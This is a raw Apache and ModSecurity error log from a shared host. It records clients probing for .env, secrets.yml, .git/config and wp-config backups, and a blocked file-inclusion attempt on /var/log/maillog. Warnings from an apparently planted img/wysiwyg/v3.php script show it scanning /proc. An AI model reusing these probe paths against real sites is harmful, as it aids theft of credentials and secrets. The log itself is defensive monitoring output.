PHP Warning:  fileperms(): stat failed for /proc/102/task/102/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/102/task/102/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/102/task/102/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/102/task/102/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/102/task/102/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:48:54.484009 2026] [authz_core:error] [pid 1319886:tid 1319905] [client 95.111.239.37:54185] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/ID3/error_log, referer: binance.com
[Mon May 11 14:49:01.119184 2026] [authz_core:error] [pid 1319886:tid 1319917] [client 95.111.239.37:56734] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/ID3/error_log, referer: binance.com
[Mon May 11 14:49:05.720945 2026] [proxy_http:error] [pid 1320398:tid 1320406] (20014)Internal error (specific information not available): [client 5.255.124.170:59426] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:05.720975 2026] [proxy:error] [pid 1320398:tid 1320406] [client 5.255.124.170:59426] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/config/secrets.yml
[Mon May 11 14:49:05.722522 2026] [proxy_http:error] [pid 1319953:tid 1319958] (20014)Internal error (specific information not available): [client 5.255.124.170:59398] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:05.722546 2026] [proxy:error] [pid 1319953:tid 1319958] [client 5.255.124.170:59398] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/application.properties
[Mon May 11 14:49:05.720928 2026] [proxy_http:error] [pid 1319886:tid 1319909] (20014)Internal error (specific information not available): [client 5.255.124.170:59444] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:05.724282 2026] [proxy:error] [pid 1319886:tid 1319909] [client 5.255.124.170:59444] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env.example
[Mon May 11 14:49:05.724646 2026] [proxy_http:error] [pid 1320674:tid 1320709] (20014)Internal error (specific information not available): [client 5.255.124.170:59494] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:05.724917 2026] [proxy:error] [pid 1320674:tid 1320709] [client 5.255.124.170:59494] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env.old
[Mon May 11 14:49:05.732973 2026] [proxy_http:error] [pid 1319885:tid 1319898] (20014)Internal error (specific information not available): [client 5.255.124.170:59378] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:05.733168 2026] [proxy:error] [pid 1319885:tid 1319898] [client 5.255.124.170:59378] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/secrets.yml
[Mon May 11 14:49:05.829758 2026] [proxy_http:error] [pid 1319886:tid 1319911] (20014)Internal error (specific information not available): [client 5.255.124.170:59604] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:05.829782 2026] [proxy:error] [pid 1319886:tid 1319911] [client 5.255.124.170:59604] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.pypirc
[Mon May 11 14:49:08.041802 2026] [proxy_http:error] [pid 1319885:tid 1319925] (20014)Internal error (specific information not available): [client 5.255.124.170:56590] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:08.045761 2026] [proxy_http:error] [pid 1319886:tid 1319921] (20014)Internal error (specific information not available): [client 5.255.124.170:59448] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:08.063207 2026] [proxy_http:error] [pid 1319886:tid 1319937] (20014)Internal error (specific information not available): [client 5.255.124.170:59614] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:08.067385 2026] [proxy_http:error] [pid 1319953:tid 1319970] (20014)Internal error (specific information not available): [client 5.255.124.170:59550] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:08.075799 2026] [proxy_http:error] [pid 1320398:tid 1320424] (20014)Internal error (specific information not available): [client 5.255.124.170:59512] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:08.082419 2026] [proxy_http:error] [pid 1319885:tid 1319889] (20014)Internal error (specific information not available): [client 5.255.124.170:59534] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 14:49:09.516930 2026] [authz_core:error] [pid 1320674:tid 1320707] [client 47.128.125.87:30630] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/interactivity-api/error_log
[Mon May 11 14:49:10.286244 2026] [authz_core:error] [pid 1320398:tid 1320409] [client 95.111.239.37:59878] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 14:49:21.883197 2026] [authz_core:error] [pid 1320398:tid 1320424] [client 95.111.239.37:62026] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 14:51:25.528600 2026] [security2:error] [pid 1320398:tid 1320417] [client 129.226.211.69:50734] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agHQzeJEyNRN152ArOSCHQAAAFE"]
[Mon May 11 14:51:37.448145 2026] [authz_core:error] [pid 1319998:tid 1320012] [client 95.111.239.37:60470] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 14:51:45.095229 2026] [authz_core:error] [pid 1320398:tid 1320415] [client 95.111.239.37:62931] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 14:51:45.535749 2026] [security2:error] [pid 1319886:tid 1319911] [client 216.73.216.110:20630] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/maillog found within ARGS:filesrc: /var/log/maillog"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHQ4ay-5-wpj6Sx56aQugAAAAg"]
[Mon May 11 14:51:45.541106 2026] [security2:error] [pid 1319886:tid 1319911] [client 216.73.216.110:20630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHQ4ay-5-wpj6Sx56aQugAAAAg"]
[Mon May 11 14:51:45.642538 2026] [security2:error] [pid 1319886:tid 1319911] [client 216.73.216.110:20630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHQ4ay-5-wpj6Sx56aQugAAAAg"]
[Mon May 11 14:51:56.233270 2026] [ssl:error] [pid 1319953:tid 1319976] (EAI 2)Name or service not known: [client 54.236.1.11:42045] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:51:56.233669 2026] [ssl:error] [pid 1319953:tid 1319976] AH01941: stapling_renew_response: responder error
[Mon May 11 14:51:57.026987 2026] [ssl:error] [pid 1320398:tid 1320405] (EAI 2)Name or service not known: [client 54.236.1.13:15317] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:51:57.027088 2026] [ssl:error] [pid 1320398:tid 1320405] AH01941: stapling_renew_response: responder error
[Mon May 11 14:51:57.537784 2026] [authz_core:error] [pid 1319886:tid 1319921] [client 95.111.239.37:50697] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 14:52:04.537411 2026] [authz_core:error] [pid 1319885:tid 1319903] [client 95.111.239.37:53399] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 14:52:18.076176 2026] [security2:error] [pid 1320674:tid 1320692] [client 34.155.115.227:33638] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.rentparadise.fr"] [uri "/.git/config"] [unique_id "agHRAqO9RdIr1DwxYR2KLgAAAMI"]
[Mon May 11 14:52:18.076421 2026] [security2:error] [pid 1320674:tid 1320692] [client 34.155.115.227:33638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.rentparadise.fr"] [uri "/.git/config"] [unique_id "agHRAqO9RdIr1DwxYR2KLgAAAMI"]
[Mon May 11 14:52:18.078919 2026] [core:error] [pid 1320674:tid 1320692] [client 34.155.115.227:33638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:52:18.081280 2026] [security2:error] [pid 1320674:tid 1320692] [client 34.155.115.227:33638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.rentparadise.fr"] [uri "/index.php"] [unique_id "agHRAqO9RdIr1DwxYR2KLgAAAMI"]
[Mon May 11 14:52:32.032051 2026] [security2:error] [pid 1319953:tid 1319977] [client 34.162.44.157:56000] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHREOSQ-m-m0ukSSht6DgAAAVY"]
[Mon May 11 14:52:32.032258 2026] [security2:error] [pid 1319953:tid 1319977] [client 34.162.44.157:56000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHREOSQ-m-m0ukSSht6DgAAAVY"]
[Mon May 11 14:52:32.033027 2026] [security2:error] [pid 1319953:tid 1319977] [client 34.162.44.157:56000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHREOSQ-m-m0ukSSht6DgAAAVY"]
[Mon May 11 14:53:00.490764 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/wp-config.php.backup"] [unique_id "agHRLKO9RdIr1DwxYR2KjgAAANQ"]
[Mon May 11 14:53:00.490909 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/wp-config.php.backup"] [unique_id "agHRLKO9RdIr1DwxYR2KjgAAANQ"]
[Mon May 11 14:53:00.491107 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agHRLKO9RdIr1DwxYR2KjgAAANQ"]
[Mon May 11 14:53:07.876081 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/backup.wp-config.php"] [unique_id "agHRM6O9RdIr1DwxYR2KsQAAANQ"]
[Mon May 11 14:53:07.876242 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/backup.wp-config.php"] [unique_id "agHRM6O9RdIr1DwxYR2KsQAAANQ"]
[Mon May 11 14:53:07.876416 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agHRM6O9RdIr1DwxYR2KsQAAANQ"]
[Mon May 11 14:53:13.618364 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/new-wp-config.php"] [unique_id "agHROaO9RdIr1DwxYR2K3gAAANQ"]
[Mon May 11 14:53:13.618512 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/new-wp-config.php"] [unique_id "agHROaO9RdIr1DwxYR2K3gAAANQ"]
[Mon May 11 14:53:13.618685 2026] [security2:error] [pid 1320674:tid 1320709] [client 20.220.233.65:60091] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "groupe-habilis.groupe-habilis.fr"] [uri "/403.shtml"] [unique_id "agHROaO9RdIr1DwxYR2K3gAAANQ"]
[Mon May 11 14:53:36.696695 2026] [security2:error] [pid 1319953:tid 1319974] [client 43.134.114.37:58128] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agHRUOSQ-m-m0ukSSht6awAAAVM"]
[Mon May 11 14:53:41.139278 2026] [security2:error] [pid 1320398:tid 1320404] [client 43.134.114.37:42314] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cpc-entreprises.com"] [uri "/"] [unique_id "agHRVeJEyNRN152ArOSC-QAAAEQ"], referer: http://www.cpc-entreprises.com
[Mon May 11 14:54:53.172588 2026] [authz_core:error] [pid 1319886:tid 1319916] [client 216.73.216.110:51412] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/cron/error_log
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704673/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704673/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704673/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704673/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704673/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704673/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:55:06.503062 2026] [security2:error] [pid 1319953:tid 1319956] [client 43.157.148.38:55262] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.classist.fr"] [uri "/"] [unique_id "agHRquSQ-m-m0ukSSht61wAAAUE"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790190/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790190/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790190/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790190/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790190/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790190/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:56:13.263678 2026] [authz_core:error] [pid 1319998:tid 1320015] [client 216.73.216.110:6141] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/lib/class/phpmailer/test/error_log
[Mon May 11 14:56:20.059859 2026] [authz_core:error] [pid 1320674:tid 1320696] [client 4.193.137.131:10180] AH01630: client denied by server configuration: /home/hominfr/public_html/wp-config-sample.php
PHP Warning:  filesize(): stat failed for /proc/968/task/968/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/968/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/968/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/968/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/968/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/968/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:56:36.080237 2026] [:error] [pid 1320398:tid 1320402] [client 43.134.57.179:51082] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/214/task/214/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/214/task/214/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/214/task/214/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/214/task/214/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/214/task/214/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/214/task/214/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:56:48.726506 2026] [security2:error] [pid 1319886:tid 1319933] [client 86.105.185.64:43283] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHSEKy-5-wpj6Sx56aSRgAAABU"], referer: https://www.piregwan-genesis.com/
[Mon May 11 14:57:02.050926 2026] [:error] [pid 1319998:tid 1320008] [client 54.38.214.226:58414] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:57:02.193983 2026] [:error] [pid 1320674:tid 1320701] [client 57.129.69.65:39978] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:57:22.901111 2026] [:error] [pid 1319886:tid 1319919] [client 108.167.188.70:18822] File does not exist: /home/cpcentre/public_html/wp-login.php
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705334/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705334/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705334/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705331/task/1705334/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705331/task/1705334/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
